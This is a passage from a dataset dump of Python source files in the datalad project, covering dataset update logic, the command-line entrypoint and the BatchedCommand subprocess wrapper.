\\\n repo.get_hexsha(repo.get_corresponding_branch()) == revision:\n res[\"message\"] = (\n \"Dataset already at commit registered in parent: %s\",\n repo.path)\n res[\"status\"] = \"notneeded\"\n yield res\n continue\n\n how_curr = how_subds if revision else how\n # get all remotes which have references (would exclude\n # special remotes)\n remotes = repo.get_remotes(\n **({'exclude_special_remotes': True} if is_annex else {}))\n if not remotes and not sibling:\n res['message'] = (\"No siblings known to dataset at %s\\nSkipping\",\n repo.path)\n res['status'] = 'notneeded'\n yield res\n continue\n curr_branch = repo.get_active_branch()\n tracking_remote = None\n if not sibling and len(remotes) == 1:\n # there is only one remote, must be this one\n sibling_ = remotes[0]\n elif not sibling:\n # nothing given, look for tracking branch\n tracking_remote = repo.get_tracking_branch(\n branch=curr_branch, remote_only=True)[0]\n sibling_ = tracking_remote\n else:\n sibling_ = sibling\n if sibling_ and sibling_ not in remotes:\n res['message'] = (\"'%s' not known to dataset %s\\nSkipping\",\n sibling_, repo.path)\n res['status'] = 'impossible'\n yield res\n continue\n if not sibling_ and len(remotes) > 1 and how_curr:\n lgr.debug(\"Found multiple siblings:\\n%s\", remotes)\n res['status'] = 'impossible'\n res['message'] = \"Multiple siblings, please specify from which to update.\"\n yield res\n continue\n lgr.info(\"Fetching updates for %s\", ds)\n # fetch remote\n fetch_kwargs = dict(\n # test against user-provided value!\n remote=None if sibling is None else sibling_,\n all_=sibling is None,\n git_options=[\n # required to not trip over submodules that were removed in\n # the origin clone\n \"--no-recurse-submodules\",\n # prune to not accumulate a mess over time\n \"--prune\"]\n )\n if not (follow_parent_lazy and repo.commit_exists(revision)):\n try:\n repo.fetch(**fetch_kwargs)\n except CommandError as exc:\n ce = CapturedException(exc)\n yield get_status_dict(status=\"error\",\n message=(\"Fetch failed: %s\", ce),\n exception=ce,\n **res,)\n continue\n\n # NOTE reevaluate ds.repo again, as it might have be converted from\n # a GitRepo to an AnnexRepo\n repo = ds.repo\n\n if follow_parent and not repo.commit_exists(revision):\n if sibling_:\n try:\n lgr.debug(\"Fetching revision %s directly for %s\",\n revision, repo)\n repo.fetch(remote=sibling_, refspec=revision,\n git_options=[\"--recurse-submodules=no\"])\n except CommandError as exc:\n ce = CapturedException(exc)\n yield dict(\n res,\n status=\"impossible\",\n message=(\n \"Attempt to fetch %s from %s failed: %s\",\n revision, sibling_, ce),\n exception=ce\n )\n continue\n else:\n yield dict(res,\n status=\"impossible\",\n message=(\"Need to fetch %s directly \"\n \"but single sibling not resolved\",\n revision))\n continue\n\n saw_update_failure = False\n if how_curr:\n if follow_parent:\n target = revision\n else:\n target = _choose_update_target(\n repo, curr_branch,\n sibling_, tracking_remote)\n\n adjusted = is_annex and repo.is_managed_branch(curr_branch)\n if adjusted:\n if follow_parent:\n yield dict(\n res, status=\"impossible\",\n message=(\"follow='parentds' is incompatible \"\n \"with adjusted branches\"))\n continue\n if how_curr != \"merge\":\n yield dict(\n res, status=\"impossible\",\n message=(\"Updating via '%s' is incompatible \"\n \"with adjusted branches\",\n how_curr))\n continue\n\n update_fn = _choose_update_fn(\n repo,\n how_curr,\n is_annex=is_annex,\n adjusted=adjusted)\n\n fn_opts = [\"--ff-only\"] if how_curr == \"ff-only\" else None\n if update_fn is not _annex_sync:\n if target is None:\n yield dict(res,\n status=\"impossible\",\n message=\"Could not determine update target\")\n continue\n\n if is_annex and reobtain_data:\n update_fn = _reobtain(ds, update_fn)\n\n for ures in update_fn(repo, sibling_, target, opts=fn_opts):\n # NOTE: Ideally the \"merge\" action would also be prefixed\n # with \"update.\", but a plain \"merge\" is used for backward\n # compatibility.\n if ures[\"status\"] != \"ok\" and (\n ures[\"action\"] == \"merge\" or\n ures[\"action\"].startswith(\"update.\")):\n saw_update_failure = True\n yield dict(res, **ures)\n\n if saw_update_failure:\n update_failures.add(ds)\n res['status'] = 'error'\n res['message'] = (\"Update of %s failed\", target)\n else:\n res['status'] = 'ok'\n save_paths.append(ds.path)\n yield res\n # we need to save updated states only if merge was requested -- otherwise\n # it was a pure fetch\n if how_curr and recursive:\n yield from _save_after_update(\n refds, save_paths, update_failures, path, saw_subds)\n\n\ndef _save_after_update(refds, tosave, update_failures, path_arg, saw_subds):\n if path_arg and not saw_subds:\n lgr.warning(\n 'path constraints did not match an installed subdataset: %s',\n path_arg)\n if refds in update_failures:\n lgr.warning(\"Not saving because top-level dataset %s \"\n \"had an update failure in subdataset\",\n refds.path)\n else:\n save_paths = [p for p in tosave if p != refds.path]\n if not save_paths:\n return\n lgr.debug(\n 'Subdatasets where updated state may need to be '\n 'saved in the parent dataset: %s', save_paths)\n for r in refds.save(\n path=save_paths,\n recursive=False,\n message='[DATALAD] Save updated subdatasets',\n return_type='generator',\n result_renderer='disabled'):\n yield r\n\n\ndef _choose_update_target(repo, branch, remote, cfg_remote):\n \"\"\"Select a target to update `repo` from.\n\n Note: This function is not concerned with _how_ the update is done (e.g.,\n merge, reset, ...).\n\n Parameters\n ----------\n repo : Repo instance\n branch : str\n The current branch.\n remote : str\n The remote which updates are coming from.\n cfg_remote : str\n The configured upstream remote.\n\n Returns\n -------\n str (the target) or None if a choice wasn't made.\n \"\"\"\n target = None\n if cfg_remote and remote == cfg_remote:\n # Use the configured cfg_remote branch as the target.\n #\n # In this scenario, it's tempting to use FETCH_HEAD as the target. For\n # a merge, that would be the equivalent of 'git pull REMOTE'. But doing\n # so would be problematic when the GitRepo.fetch() call was passed\n # all_=True. Given we can't use FETCH_HEAD, it's tempting to use the\n # branch.*.merge value, but that assumes a value for remote.*.fetch.\n target = repo.call_git_oneline(\n [\"rev-parse\", \"--symbolic-full-name\", \"--abbrev-ref=strict\",\n \"@{upstream}\"],\n read_only=True)\n elif branch:\n remote_branch = \"{}/{}\".format(remote, branch)\n if repo.commit_exists(remote_branch):\n target = remote_branch\n return target\n\n\n# Update functions\n\n\ndef _choose_update_fn(repo, how, is_annex=False, adjusted=False):\n if adjusted and how != \"merge\":\n raise RuntimeError(\n \"bug: Upstream checks should abort if adjusted is used \"\n \"with action other than 'merge'\")\n elif how in [\"merge\", \"ff-only\"]:\n if adjusted and is_annex:\n # For adjusted repos, blindly sync.\n fn = _annex_sync\n elif is_annex:\n fn = _annex_plain_merge\n elif adjusted:\n raise RuntimeError(\n \"bug: Upstream checks should make it impossible for \"\n \"adjusted=True, is_annex=False\")\n else:\n fn = _plain_merge\n elif how == \"reset\":\n fn = _reset_hard\n elif how == \"checkout\":\n fn = _checkout\n else:\n raise ValueError(f\"Unrecognized value for `how`: {how}\")\n return fn\n\n\ndef _try_command(record, fn, *args, **kwargs):\n \"\"\"Call `fn`, catching a `CommandError`.\n\n Parameters\n ----------\n record : dict\n A partial result record. It should at least have 'action' and 'message'\n fields. A 'status' value of 'ok' or 'error' will be added based on\n whether calling `fn` raises a `CommandError`.\n\n Returns\n -------\n A new record with a 'status' field.\n \"\"\"\n try:\n fn(*args, **kwargs)\n except CommandError as exc:\n ce = CapturedException(exc)\n return dict(record, status=\"error\", message=str(ce))\n else:\n return dict(record, status=\"ok\")\n\n\ndef _plain_merge(repo, _, target, opts=None):\n yield _try_command(\n {\"action\": \"merge\", \"message\": (\"Merged %s\", target)},\n repo.merge,\n name=target, options=opts,\n expect_fail=True, expect_stderr=True)\n\n\ndef _annex_plain_merge(repo, _, target, opts=None):\n yield from _plain_merge(repo, _, target, opts=opts)\n # Note: Avoid repo.merge_annex() so we don't needlessly create synced/\n # branches.\n yield _try_command(\n {\"action\": \"update.annex_merge\", \"message\": \"Merged annex branch\"},\n repo.call_annex, [\"merge\"])\n\n\ndef _annex_sync(repo, remote, _target, opts=None):\n yield _try_command(\n {\"action\": \"update.annex_sync\", \"message\": \"Ran git-annex-sync\"},\n repo.call_annex,\n ['sync', '--no-push', '--pull', '--no-commit', '--no-content', remote])\n\n\ndef _reset_hard(repo, _, target, opts=None):\n if repo.dirty:\n yield {\"action\": \"update.reset\",\n \"status\": \"error\",\n \"message\": \"Refusing to reset dirty working tree\"}\n else:\n yield _try_command(\n {\"action\": \"update.reset\", \"message\": (\"Reset to %s\", target)},\n repo.call_git,\n [\"reset\", \"--hard\", target])\n\n\ndef _checkout(repo, _, target, opts=None):\n yield _try_command(\n {\"action\": \"update.checkout\", \"message\": (\"Checkout %s\", target)},\n repo.call_git,\n [\"checkout\", target])\n\n\ndef _reobtain(ds, update_fn):\n def wrapped(*args, **kwargs):\n repo = ds.repo\n repo_pathobj = repo.pathobj\n\n lgr.info(\"Applying updates to %s\", ds)\n # get all annexed files that have data present\n lgr.info('Recording file content availability '\n 'to re-obtain updated files later on')\n ainfo = repo.get_content_annexinfo(\n init=None, eval_availability=True)\n # Recode paths for ds.get() call.\n present_files = [str(ds.pathobj / f.relative_to(repo_pathobj))\n for f, st in ainfo.items() if st[\"has_content\"]]\n\n yield from update_fn(*args, **kwargs)\n\n present_files = [p for p in present_files if lexists(p)]\n if present_files:\n lgr.info('Ensuring content availability for %i '\n 'previously available files',\n len(present_files))\n yield from ds.get(present_files, recursive=False,\n return_type='generator')\n return wrapped\n" }, { "alpha_fraction": 0.73384028673172, "alphanum_fraction": 0.73384028673172, "avg_line_length": 28.22222137451172, "blob_id": "d24384eaefe8ae343b820930840acc42ea8b38e9", "content_id": "fb2a060968ae41c32304236540c42246e308db44", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "permissive", "max_line_length": 76, "num_lines": 9, "path": "/datalad/plugin/no_annex.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.no_annex is deprecated and will be removed in a future \"\n \"release. \"\n \"Use the module from its new location datalad.local.no_annex instead.\",\n DeprecationWarning)\n\nfrom datalad.local.no_annex import *\n" }, { "alpha_fraction": 0.6453213691711426, "alphanum_fraction": 0.6481055617332458, "avg_line_length": 33.7100830078125, "blob_id": "fc3f1a675bd9ea690a939e0e96f594e6f398ff24", "content_id": "bb68e46c86e09825e3d5600f806b676cab33a9be", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8261, "license_type": "permissive", "max_line_length": 87, "num_lines": 238, "path": "/datalad/cli/main.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"This is the main() CLI entryproint\"\"\"\n\n# It should start-up and run as fast as possible for a responsive CLI.\n\n# Imports are done inline and as late as possible to avoid paying for\n# an unconditional commulative overhead that is only actually needed\n# in some special cases.\n\n__docformat__ = 'restructuredtext'\n\nimport logging\n\nlgr = logging.getLogger('datalad.cli')\n\nlgr.log(5, \"Importing cli.main\")\n\nimport os\nimport sys\n\nimport datalad\n\nfrom .parser import setup_parser\n\n# TODO cross-check with unconditional imports in .parser\n# special case imports\n# from .helpers import _fix_datalad_ri\n# import platform\n# from .helpers import _parse_overrides_from_cmdline\n# from datalad.utils import chpwd\n# from .utils import setup_exceptionhook\n# from datalad.support.exceptions import ...\n\n# unconditional imports, no meaningful functionality without them\n# from .parser import setup_parser\n\n\ndef _on_msys_tainted_paths():\n \"\"\"This duplicates datalad.utils.on_msys_tainted_paths\n\n But it does it while minimizing runtime penalties on all irrelevant\n systems.\n \"\"\"\n if os.environ.get('MSYSTEM', '')[:4] not in ('MSYS', 'MING'):\n return False\n if 'MSYS_NO_PATHCONV' in os.environ:\n return False\n import platform\n if platform.system().lower() != 'windows':\n return False\n return True\n\n\ndef main(args=sys.argv):\n \"\"\"Main CLI entrypoint\"\"\"\n lgr.log(5, \"Starting main(%r)\", args)\n # record that we came in via the cmdline\n datalad.__api = 'cmdline'\n completing = \"_ARGCOMPLETE\" in os.environ\n if completing and 'COMP_LINE' in os.environ:\n import shlex\n\n # TODO support posix=False too?\n args = shlex.split(os.environ['COMP_LINE']) or args\n\n if _on_msys_tainted_paths():\n # Possibly present DataLadRIs were stripped of a leading /\n from .helpers import _fix_datalad_ri\n args = [_fix_datalad_ri(s) for s in args]\n\n from datalad.support.entrypoints import load_extensions\n\n # load extensions requested by configuration\n # analog to what coreapi is doing for a Python session\n # importantly, load them prior to parser construction, such\n # that CLI tuning is also within reach for extensions\n load_extensions()\n\n # PYTHON_ARGCOMPLETE_OK\n # TODO possibly construct a dedicated parser just for autocompletion\n # rather than lobotomizing the normal one\n parser = setup_parser(args, completing=completing)\n try:\n import argcomplete\n argcomplete.autocomplete(parser)\n except ImportError:\n pass\n\n # parse cmd args\n lgr.debug(\"Parsing known args among %r\", args)\n cmdlineargs, unparsed_args = parser.parse_known_args(args[1:])\n # did the parser tell us what command to run?\n has_func = hasattr(cmdlineargs, 'func') and cmdlineargs.func is not None\n if unparsed_args:\n if has_func:\n lgr.error('unknown argument%s: %s',\n 's' if len(unparsed_args) > 1 else '',\n unparsed_args if len(unparsed_args) > 1 else unparsed_args[0],\n )\n cmdlineargs.subparser.print_usage()\n sys.exit(1)\n else:\n # store all unparsed arguments\n cmdlineargs.datalad_unparsed_args = unparsed_args\n\n # pull config overrides from cmdline args and put in effect\n if cmdlineargs.cfg_overrides is not None:\n from .helpers import _parse_overrides_from_cmdline\n datalad.cfg.overrides.update(\n _parse_overrides_from_cmdline(cmdlineargs)\n )\n # enable overrides\n datalad.cfg.reload(force=True)\n # try loading extensions again, in case the configuration\n # added new ones to consider\n load_extensions()\n\n if 'datalad.runtime.librarymode' in datalad.cfg:\n datalad.enable_librarymode()\n\n if cmdlineargs.change_path is not None:\n from datalad.utils import chpwd\n for path in cmdlineargs.change_path:\n chpwd(path)\n\n # check argparse could determine what commands needs to be executed\n if not has_func:\n # just let argparser spit out its error, since there is smth wrong\n parser.parse_args(args)\n # if that one didn't puke -- we should\n parser.print_usage()\n lgr.error(\"Please specify the command\")\n # matches exit code for InsufficientArgumentsError\n sys.exit(2)\n\n _run(cmdlineargs)\n\n\ndef _run(namespace):\n \"\"\"Execute a CLI operation\n\n Depending on CLI debugging options the CLI operation is executed\n in a debug harness or an exception handler.\n\n Parameters\n ----------\n namespace: Namespace\n Object returned by `ArgumentParser.parse_args()` with fully\n populated and validated CLI command and arguments.\n\n Raises\n ------\n SystemExit\n When the CLI completed without error (exit 0).\n \"\"\"\n # execute the command, either with a debugger catching\n # a crash, or with a simplistic exception handler.\n # note that result rendering is happening in the\n # execution handler, when the command-generator is unwound\n ret = _run_with_debugger(namespace) \\\n if namespace.common_debug or namespace.common_idebug \\\n else _run_with_exception_handler(namespace)\n\n # all good, not strictly needed, but makes internal testing easier\n sys.exit(0)\n\n\ndef _run_with_debugger(cmdlineargs):\n \"\"\"Execute the command and drop into debugger if it crashes\"\"\"\n from .utils import setup_exceptionhook\n\n # so we could see/stop clearly at the point of failure\n setup_exceptionhook(ipython=cmdlineargs.common_idebug)\n return cmdlineargs.func(cmdlineargs)\n\n\ndef _run_with_exception_handler(cmdlineargs):\n \"\"\"Execute the command and perform some reporting\n normalization if it crashes, but otherwise just let it go\"\"\"\n # otherwise - guard and only log the summary. Postmortem is not\n # as convenient if being caught in this ultimate except\n try:\n return cmdlineargs.func(cmdlineargs)\n # catch BaseException for KeyboardInterrupt\n except BaseException as exc:\n from datalad.support.exceptions import (\n CapturedException,\n CommandError,\n IncompleteResultsError,\n InsufficientArgumentsError,\n )\n ce = CapturedException(exc)\n # we crashed, it has got to be non-zero for starters\n exit_code = 1\n if isinstance(exc, InsufficientArgumentsError):\n # if the func reports inappropriate usage, give help output\n lgr.error('%s (%s)', ce, exc.__class__.__name__)\n cmdlineargs.subparser.print_usage(sys.stderr)\n exit_code = 2\n elif isinstance(exc, IncompleteResultsError):\n # in general we do not want to see the error again, but\n # present in debug output\n lgr.debug('could not perform all requested actions: %s', ce)\n elif isinstance(exc, CommandError):\n exit_code = _communicate_commanderror(exc) or exit_code\n elif isinstance(exc, KeyboardInterrupt):\n from datalad.ui import ui\n ui.error(\"\\nInterrupted by user while doing magic: %s\" % ce)\n exit_code = 3\n else:\n # some unforeseen problem\n lgr.error('%s', ce.format_with_cause())\n sys.exit(exit_code)\n\n\ndef _communicate_commanderror(exc):\n \"\"\"Behave as if the command ran directly\"\"\"\n exc_msg = exc.to_str(include_output=False)\n if exc_msg:\n msg = exc_msg.encode() if isinstance(exc_msg, str) else exc_msg\n os.write(2, msg + b\"\\n\")\n # push any captured output to the respective streams\n for out, stream in ((exc.stdout, 1), (exc.stderr, 2)):\n if out:\n os.write(stream,\n out.encode() if isinstance(out, str) else out)\n # pass on exit code\n return exc.code\n\n\nlgr.log(5, \"Done importing cli.main\")\n" }, { "alpha_fraction": 0.5609220266342163, "alphanum_fraction": 0.5626261234283447, "avg_line_length": 34.39523696899414, "blob_id": "6a4b7bcf33cf37b8931d5b3bf064a9a72d04c661", "content_id": "51e5b02d7ea611c1e912cdad73008ff59d09e32d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22299, "license_type": "permissive", "max_line_length": 105, "num_lines": 630, "path": "/datalad/cmd.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\nClass the starts a subprocess and keeps it around to communicate with it\nvia stdin. For each instruction send over stdin, a response is read and\nreturned. The response structure is determined by \"output_proc\"\n\n\"\"\"\nfrom __future__ import annotations\n\nimport logging\nimport os\nimport queue\nimport sys\nimport warnings\nfrom datetime import datetime\nfrom operator import attrgetter\nfrom queue import Queue\nfrom subprocess import TimeoutExpired\nfrom typing import (\n Any,\n Callable,\n List,\n Optional,\n Tuple,\n Union,\n)\nfrom weakref import (\n ReferenceType,\n WeakValueDictionary,\n ref,\n)\n\nfrom datalad import cfg\n# start of legacy import block\n# to avoid breakage of code written before datalad.runner\nfrom datalad.runner.coreprotocols import (\n KillOutput,\n NoCapture,\n StdErrCapture,\n StdOutCapture,\n StdOutErrCapture,\n)\nfrom datalad.runner.gitrunner import (\n GIT_SSH_COMMAND,\n GitRunnerBase,\n GitWitlessRunner,\n)\nfrom datalad.runner.nonasyncrunner import (\n STDERR_FILENO,\n STDOUT_FILENO,\n _ResultGenerator,\n run_command,\n)\nfrom datalad.runner.protocol import (\n GeneratorMixIn,\n WitlessProtocol,\n)\nfrom datalad.runner.runner import WitlessRunner\nfrom datalad.runner.utils import LineSplitter\nfrom datalad.support.exceptions import CommandError\nfrom datalad.utils import (\n auto_repr,\n ensure_unicode,\n)\n\n# end of legacy import block\n\n\n\n__docformat__ = \"restructuredtext\"\n\n\n_cfg_var = \"datalad.runtime.stalled-external\"\n_cfg_val = cfg.obtain(_cfg_var)\n\n\nclass BatchedCommandError(CommandError):\n def __init__(self,\n cmd=\"\",\n last_processed_request=\"\",\n msg=\"\",\n code=None,\n stdout=\"\",\n stderr=\"\",\n cwd=None,\n **kwargs):\n \"\"\"\n This exception extends a CommandError that is raised by the command,\n that is executed by `BatchedCommand`. It extends the `CommandError` by\n `last_processed_request`. This attribute contains the last request, i.e.\n argument to `BatchedCommand.__call__()`, that was successfully\n processed, i.e. for which a result was received from the command (that\n does not imply that the result was positive).\n\n :param last_processed_request: the last request for which a response was\n received from the underlying command. This could be used to restart\n an interrupted process.\n\n For all other arguments see `CommandError`.\n \"\"\"\n CommandError.__init__(\n self,\n cmd=cmd,\n msg=msg,\n code=code,\n stdout=stdout,\n stderr=stderr,\n cwd=cwd,\n **kwargs\n )\n self.last_processed_request = last_processed_request\n\n\nlgr = logging.getLogger('datalad.cmd')\n\n# TODO unused?\n# In python3 to split byte stream on newline, it must be bytes\nlinesep_bytes = os.linesep.encode()\n\n# TODO unused?\n_TEMP_std = sys.stdout, sys.stderr\n\n# TODO unused?\n# To be used in the temp file name to distinguish the ones we create\n# in Runner so we take care about their removal, in contrast to those\n# which might be created outside and passed into Runner\n_MAGICAL_OUTPUT_MARKER = \"_runneroutput_\"\n\n\ndef readline_rstripped(stdout):\n warnings.warn(\"the function `readline_rstripped()` is deprecated \"\n \"and will be removed in a future release\",\n DeprecationWarning)\n return _readline_rstripped(stdout)\n\n\ndef _readline_rstripped(stdout):\n \"\"\"Internal helper for BatchedCommand\"\"\"\n return stdout.readline().rstrip()\n\n\nclass BatchedCommandProtocol(GeneratorMixIn, StdOutErrCapture):\n def __init__(self,\n batched_command: \"BatchedCommand\",\n done_future: Any = None,\n encoding: Optional[str] = None,\n output_proc: Optional[Callable] = None,\n ):\n GeneratorMixIn.__init__(self)\n StdOutErrCapture.__init__(self, done_future, encoding)\n self.batched_command = batched_command\n self.output_proc = output_proc\n self.line_splitter = LineSplitter()\n\n def pipe_data_received(self, fd: int, data: bytes):\n if fd == STDERR_FILENO:\n self.send_result((fd, data))\n elif fd == STDOUT_FILENO:\n for line in self.line_splitter.process(data.decode(self.encoding)):\n self.send_result((fd, line))\n else:\n raise ValueError(f\"unknown file descriptor: {fd}\")\n\n def pipe_connection_lost(self, fd: int, exc: Optional[BaseException]):\n if fd == STDOUT_FILENO:\n remaining_line = self.line_splitter.finish_processing()\n if remaining_line is not None:\n lgr.debug(\"unterminated line: %s\", remaining_line)\n self.send_result((fd, remaining_line))\n\n def timeout(self, fd: Optional[int]) -> bool:\n timeout_error = self.batched_command.get_timeout_exception(fd)\n if timeout_error:\n raise timeout_error\n self.send_result((\"timeout\", fd))\n return False\n\n\nclass ReadlineEmulator:\n \"\"\"\n This class implements readline() on the basis of an instance of\n BatchedCommand. Its purpose is to emulate stdout's for output_procs,\n This allows us to provide a BatchedCommand API that is identical\n to the old version, but with an implementation that is based on the\n threaded runner.\n \"\"\"\n def __init__(self,\n batched_command: \"BatchedCommand\"):\n self.batched_command = batched_command\n\n def readline(self):\n \"\"\"\n Read from the stdout provider until we have a line or None (which\n indicates some error).\n \"\"\"\n return self.batched_command.get_one_line()\n\n\nclass SafeDelCloseMixin(object):\n \"\"\"A helper class to use where __del__ would call .close() which might\n fail if \"too late in GC game\"\n \"\"\"\n def __del__(self):\n try:\n self.close()\n except (TypeError, ImportError):\n # ImportError could be raised when the interpreter is shutting down.\n if os.fdopen is None or lgr.debug is None:\n # if we are late in the game and things already gc'ed in py3,\n # it is Ok\n return\n raise\n\n\n@auto_repr\nclass BatchedCommand(SafeDelCloseMixin):\n \"\"\"\n Container for a running subprocess. Supports communication with the\n subprocess via stdin and stdout.\n \"\"\"\n\n # Collection of active BatchedCommands as a mapping from object IDs to\n # instances\n _active_instances: WeakValueDictionary[int, BatchedCommand] = WeakValueDictionary()\n\n def __init__(self,\n cmd: Union[str, Tuple, List],\n path: Optional[str] = None,\n output_proc: Optional[Callable] = None,\n timeout: Optional[float] = None,\n exception_on_timeout: bool = False,\n ):\n\n command = cmd\n self.command: list = [command] if not isinstance(command, List) else command\n self.path: Optional[str] = path\n self.output_proc: Optional[Callable] = output_proc\n self.timeout: Optional[float] = timeout\n self.exception_on_timeout: bool = exception_on_timeout\n\n self.stderr_output = b\"\"\n self.runner: Optional[WitlessRunner] = None\n self.encoding = None\n self.wait_timed_out = None\n self.return_code: Optional[int] = None\n self._abandon_cache = None\n self.last_request: Optional[str] = None\n\n self._active = 0\n self._active_last = _now()\n self.clean_inactive()\n assert id(self) not in self._active_instances\n self._active_instances[id(self)] = self\n\n # pure declarations\n self.stdin_queue: Queue\n self.generator: _ResultGenerator\n\n @classmethod\n def clean_inactive(cls):\n from . import cfg\n max_batched = cfg.obtain(\"datalad.runtime.max-batched\")\n max_inactive_age = cfg.obtain(\"datalad.runtime.max-inactive-age\")\n if len(cls._active_instances) > max_batched:\n active_qty = 0\n inactive = []\n for c in cls._active_instances.values():\n if c._active:\n active_qty += 1\n else:\n inactive.append(c)\n inactive.sort(key=attrgetter(\"_active_last\"))\n to_close = len(cls._active_instances) - max_batched\n if to_close <= 0:\n return\n too_young = 0\n now = _now()\n for i, c in enumerate(inactive):\n if (now - c._active_last).total_seconds() <= max_inactive_age:\n too_young = len(inactive) - i\n break\n elif c._active:\n active_qty += 1\n else:\n c.close()\n cls._active_instances.pop(id(c), None)\n to_close -= 1\n if to_close <= 0:\n break\n if to_close > 0:\n lgr.debug(\n \"Too many BatchedCommands remaining after cleanup;\"\n \" %d active, %d went inactive recently\",\n active_qty,\n too_young,\n )\n\n def _initialize(self):\n\n lgr.debug(\"Starting new runner for %s\", repr(self))\n lgr.log(5, \"Command: %s\", self.command)\n\n self.stdin_queue = queue.Queue()\n self.stderr_output = b\"\"\n self.wait_timed_out = None\n self.return_code = None\n self.last_request = None\n\n self.runner = WitlessRunner(\n cwd=self.path,\n env=GitRunnerBase.get_git_environ_adjusted()\n )\n self.generator = self.runner.run(\n cmd=self.command,\n protocol=BatchedCommandProtocol,\n stdin=self.stdin_queue,\n cwd=self.path,\n # This mimics the behavior of the old implementation w.r.t\n # timeouts when waiting for the closing process\n timeout=self.timeout or 11.0,\n # Keyword arguments for the protocol\n batched_command=self,\n output_proc=self.output_proc,\n )\n self.encoding = self.generator.runner.protocol.encoding\n\n self._active_last = _now()\n\n def process_running(self) -> bool:\n if self.runner:\n if self.generator.runner.process is None:\n return False\n result = self.generator.runner.process.poll()\n if result is None:\n return True\n self.return_code = result\n self.runner = None\n if result != 0:\n raise BatchedCommandError(\n cmd=\" \".join(self.command),\n last_processed_request=self.last_request,\n msg=f\"{type(self).__name__}: exited with {result} after \"\n f\"request: {self.last_request}\",\n code=result\n ) from CommandError\n return False\n\n def __call__(self,\n cmds: Union[str, Tuple, List]):\n \"\"\"\n Send requests to the subprocess and return the responses. We expect one\n response per request. How the response is structured is determined by\n output_proc. If output_proc returns not-None, the responses is\n considered to be a response.\n\n If output_proc is not provided, we assume that a single response is\n a single line.\n\n If the subprocess does not exist yet it is started before the first\n command is sent.\n\n Parameters\n ----------\n cmds : str or tuple or list of (str or tuple)\n request for the subprocess\n\n Returns\n -------\n (return_type[self.output_proc] | str)\n | list[(return_type[self.output_proc] | str)]\n\n Responses received from process. Either a single element, or a list\n of elements, if `cmds` was a list.\n The type of the elements is `str`, if `self.output_proc` is `None`.\n If `self.output_proc` is not `None`, the result type of\n `self.output_proc` determines the type of the elements.\n \"\"\"\n self._active += 1\n requests = cmds\n\n input_multiple = isinstance(requests, list)\n if not input_multiple:\n requests = [requests]\n\n responses = []\n try:\n # This code assumes that each processing request is\n # a single line and leads to a response that triggers a\n # `send_result` in the protocol.\n for request in requests:\n while True:\n try:\n responses.append(self.process_request(request))\n self.last_request = request\n break\n except StopIteration:\n # The process finished executing, store the last return\n # code and restart the process.\n lgr.debug(\"%s: command exited\", self)\n self.return_code = self.generator.return_code\n self.runner = None\n\n except CommandError as command_error:\n # Convert CommandError into BatchedCommandError\n self.runner = None\n self.return_code = command_error.code\n raise BatchedCommandError(\n cmd=command_error.cmd,\n last_processed_request=self.last_request,\n msg=command_error.msg,\n code=command_error.code,\n stdout=command_error.stdout,\n stderr=command_error.stderr,\n cwd=command_error.cwd,\n **command_error.kwargs\n ) from command_error\n\n finally:\n self._active -= 1\n return responses if input_multiple else responses[0] if responses else None\n\n def process_request(self,\n request: Union[Tuple, str]) -> Any | None:\n\n self._active += 1\n try:\n\n if not self.process_running():\n self._initialize()\n\n # Remember request and send it to subprocess\n if not isinstance(request, str):\n request = ' '.join(request)\n self.stdin_queue.put((request + \"\\n\").encode())\n\n # Get the response from the generator. We only consider\n # data received on stdout as a response.\n if self.output_proc:\n # If we have an output procedure, let the output procedure\n # read stdout and decide about the nature of the response\n response = self.output_proc(ReadlineEmulator(self))\n else:\n # If there is no output procedure we assume that a response\n # is one line.\n response = self.get_one_line()\n if response is not None:\n response = response.rstrip()\n return response\n\n finally:\n self._active -= 1\n\n def proc1(self,\n single_command: str):\n \"\"\"\n Simulate the old interface. This method is used only once in\n AnnexRepo.get_metadata()\n \"\"\"\n self._active += 1\n try:\n assert isinstance(single_command, str)\n return self(single_command)\n finally:\n self._active -= 1\n\n def get_one_line(self) -> Optional[str]:\n \"\"\"\n Get a single stdout line from the generator.\n\n If timeout was specified, and exception_on_timeout is False,\n and if a timeout occurs, return None. Otherwise, return the\n string that was read from the generator.\n \"\"\"\n\n # Implementation remarks:\n # 1. We know that BatchedCommandProtocol only returns complete lines on\n # stdout, that makes this code simple.\n # 2. stderr is handled transparently within this method,\n # by adding all stderr-content to an internal buffer.\n while True:\n source, data = self.generator.send(None)\n if source == STDERR_FILENO:\n self.stderr_output += data\n elif source == STDOUT_FILENO:\n return data\n elif source == \"timeout\":\n # TODO: we should restart the subprocess on timeout, otherwise\n # we might end up with results from a previous instruction,\n # when handling multiple instructions at once. Until this is\n # done properly, communication timeouts are ignored in order\n # to avoid errors.\n if data is None:\n lgr.debug('BatchedCommand: timeout on process')\n else:\n lgr.debug('BatchedCommand: timeout on file descriptor %d', data)\n else:\n raise ValueError(f\"{self}: unknown source: {source}\")\n\n def close(self, return_stderr=False):\n \"\"\"\n Close communication and wait for process to terminate. If the \"timeout\"\n parameter to the constructor was not None, and if the configuration\n setting \"datalad.runtime.stalled-external\" is set to \"abandon\",\n the method will return latest after \"timeout\" seconds. If the subprocess\n did not exit within this 